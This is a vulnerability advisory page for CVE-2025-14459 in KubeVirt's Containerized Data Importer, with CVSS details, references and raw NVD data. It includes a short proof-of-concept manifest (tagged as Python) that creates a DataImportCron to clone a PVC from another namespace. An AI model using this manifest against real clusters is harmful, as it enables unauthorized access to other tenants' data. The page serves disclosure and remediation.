CVE-2025-14459

Description

A flaw was found in KubeVirt Containerized Data Importer (CDI). This vulnerability allows a user to clone PersistentVolumeClaims (PVCs) from unauthorized namespaces, resulting in unauthorized access to data via the DataImportCron PVC source mechanism.

CVSS Details

CVSS Score

8.5

Severity

HIGH

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:L/A:N

Configurations (Affected Products)

No configuration data available.

KubeVirt CDI < fixed version (refer to RHSA-2026:0950)

Red Hat OpenShift Virtualization affected versions (see Red Hat errata)

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

# CVE-2025-14459 PoC - KubeVirt CDI Unauthorized PVC Clone
apiVersion: cdi.kubevirt.io/v1beta1
kind: DataImportCron
metadata:
  name: malicious-cron
  namespace: attacker-controlled-namespace
spec:
  schedule: "0 * * * *"
  managedDataSource: test-source
  garbageCollect: Outdated
  source:
    pvc:
      namespace: target-sensitive-namespace  # Target namespace with sensitive data
      name: sensitive-data-pvc              # PVC to clone without authorization
  importPolicy:
    completionTimeoutMinutes: 60
---
# Attacker needs basic permissions in 'attacker-controlled-namespace': kubectl auth can-create pods/pvc
# After cron creation, CDI will clone the PVC from target namespace
# Attacker can then access the cloned data through the new PVC

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-14459
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-14459
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-14459/
[4] VulDB https://vuldb.com/cve/CVE-2025-14459
[5] https://access.redhat.com/errata/RHSA-2026:0950
[6] https://access.redhat.com/security/cve/CVE-2025-14459
[7] https://bugzilla.redhat.com/show_bug.cgi?id=2420938

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-14459", "sourceIdentifier": "[email protected]", "published": "2026-01-26T20:16:07.983", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "A flaw was found in KubeVirt Containerized Data Importer (CDI). This vulnerability allows a user to clone PersistentVolumeClaims (PVCs) from unauthorized namespaces, resulting in unauthorized access to data via the DataImportCron PVC source mechanism."}, {"lang": "es", "value": "Se encontró una falla en KubeVirt Containerized Data Importer (CDI). Esta vulnerabilidad permite a un usuario clonar PersistentVolumeClaims (PVCs) desde espacios de nombres no autorizados, lo que resulta en acceso no autorizado a datos a través del mecanismo de origen de PVC DataImportCron."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:L/A:N", "baseScore": 8.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.1, "impactScore": 4.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-639"}]}], "references": [{"url": "https://access.redhat.com/errata/RHSA-2026:0950", "source": "[email protected]"}, {"url": "https://access.redhat.com/security/cve/CVE-2025-14459", "source": "[email protected]"}, {"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2420938", "source": "[email protected]"}]}}